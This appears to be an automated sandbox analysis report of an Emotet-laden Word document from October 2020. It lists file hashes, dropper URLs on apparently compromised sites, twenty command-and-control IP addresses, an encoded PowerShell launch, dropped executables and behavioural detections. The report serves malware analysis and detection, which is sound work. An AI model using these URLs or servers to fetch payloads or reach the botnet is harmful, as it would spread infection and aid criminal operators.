Analysis

  • max time kernel
    30s
  • max time network
    32s
  • platform
    windows10_x64
  • resource
    win10
  • submitted
    27-10-2020 16:48

General

  • Target

    9f01a1f41afb800dc19b023fa3a864efcc17a6c0624897ae4326e695ceb6d893.doc

  • Size

    179KB

  • MD5

    195b26f04a16b641bdcecc5084ca815d

  • SHA1

    8b87e7f06c75a926103c28fd0b7b8fab532af1a4

  • SHA256

    9f01a1f41afb800dc19b023fa3a864efcc17a6c0624897ae4326e695ceb6d893

  • SHA512

    54591f496f64ecbb54158c0c175a3499b4cd7fc346bef6a5439f31f783068dcefc4f626f0e11d72607817103fa9e6c9fb0e85ef4ce146cec491dcd3d0aed3236

Malware Config

Extracted

  • Language
    ps1
  • Source
    exe.dropper
  • URLs
    http://car4libya.com/cgi-bin/sDBhPqx/
    http://ostranderandassociates.com/var/thpY/
    http://acredales.com/thank_you/U0u9Z/
    http://scw8.net/wp-content/1MkWc/
    https://adinterix.com/laybuy-investors/9Ab6/
    http://uxnew.com/old/9/
    http://www.queensport.nl/accp/dz/
    https://bahamianrelief.org/VpHo/ey/

Extracted

  • Family
    emotet
  • Botnet
    Epoch2
  • C2
    67.163.161.107:80
    107.170.146.252:8080
    173.212.214.235:7080
    167.114.153.111:8080
    185.94.252.104:443
    110.142.236.207:80
    194.187.133.160:443
    218.147.193.146:80
    172.104.97.173:8080
    216.139.123.119:80
    50.91.114.38:80
    202.134.4.211:8080
    113.61.66.94:80
    139.99.158.11:443
    62.171.142.179:8080
    37.139.21.175:8080
    190.108.228.27:443
    94.23.237.171:443
    154.91.33.137:443
    201.241.127.190:80
  • rsa_pubkey.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Emotet Payload 4 IoCs

    Detects Emotet payload in memory.

  • Blacklisted process makes network request 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\9f01a1f41afb800dc19b023fa3a864efcc17a6c0624897ae4326e695ceb6d893.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:3876
  • C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
    POwersheLL -ENCOD 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
    1⤵
    • Process spawned unexpected child process
    • Blacklisted process makes network request
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:2268
  • C:\Users\Admin\N_jdesu\N6qw0zr\F1iv94s.exe
    C:\Users\Admin\N_jdesu\N6qw0zr\F1iv94s.exe
    1⤵
    • Executes dropped EXE
    • Drops file in System32 directory
    • Suspicious use of WriteProcessMemory
    PID:3964
    • C:\Windows\SysWOW64\IDStore\wsmprovhost.exe
      "C:\Windows\SysWOW64\IDStore\wsmprovhost.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      PID:1140

Network

MITRE ATT&CK Matrix ATT&CK v6

  • Discovery
    • Query Registry (2) T1012
    • System Information Discovery (2) T1082

Downloads

  • C:\Users\Admin\N_jdesu\N6qw0zr\F1iv94s.exe
    MD5

    44159153fabe28642e068351999c5573

    SHA1

    725f004ce99979aa808fa1bfd1d33d0b84146780

    SHA256

    e3fa57c5e24d254e1f737f20f3ce2f2df786f427d74b6a08b7d86c47f0116a62

    SHA512

    8f792696af4d74c5213a51086501abaea7d16d91f800b44ac0fe333012a998e74221b2de3f9a4f39686d4740d853b497293a85b8aef540e51c06355c2d8cdaa9

  • C:\Windows\SysWOW64\IDStore\wsmprovhost.exe
    MD5

    44159153fabe28642e068351999c5573

    SHA1

    725f004ce99979aa808fa1bfd1d33d0b84146780

    SHA256

    e3fa57c5e24d254e1f737f20f3ce2f2df786f427d74b6a08b7d86c47f0116a62

    SHA512

    8f792696af4d74c5213a51086501abaea7d16d91f800b44ac0fe333012a998e74221b2de3f9a4f39686d4740d853b497293a85b8aef540e51c06355c2d8cdaa9

  • memory/1140-18-0x0000000000900000-0x000000000091E000-memory.dmp
    Filesize

    120KB

  • memory/1140-17-0x00000000008E0000-0x0000000000900000-memory.dmp
    Filesize

    128KB

  • memory/1140-15-0x0000000000000000-mapping.dmp
  • memory/2268-8-0x00007FF991260000-0x00007FF991C4C000-memory.dmp
    Filesize

    9MB

  • memory/2268-9-0x000002F47A650000-0x000002F47A651000-memory.dmp
    Filesize

    4KB

  • memory/2268-10-0x000002F47AAC0000-0x000002F47AAC1000-memory.dmp
    Filesize

    4KB

  • memory/3876-7-0x00000278B249A000-0x00000278B249F000-memory.dmp
    Filesize

    20KB

  • memory/3876-0-0x00007FF998610000-0x00007FF998C47000-memory.dmp
    Filesize

    6MB

  • memory/3876-6-0x00000278AFC5C000-0x00000278AFC61000-memory.dmp
    Filesize

    20KB

  • memory/3876-5-0x00000278B2281000-0x00000278B2286000-memory.dmp
    Filesize

    20KB

  • memory/3876-4-0x00000278B2281000-0x00000278B2286000-memory.dmp
    Filesize

    20KB

  • memory/3876-3-0x00000278B2286000-0x00000278B228B000-memory.dmp
    Filesize

    20KB

  • memory/3876-2-0x00000278B2281000-0x00000278B2286000-memory.dmp
    Filesize

    20KB

  • memory/3876-1-0x00000278B2286000-0x00000278B228B000-memory.dmp
    Filesize

    20KB

  • memory/3964-13-0x00000000006D0000-0x00000000006F0000-memory.dmp
    Filesize

    128KB

  • memory/3964-14-0x0000000000710000-0x000000000072E000-memory.dmp
    Filesize

    120KB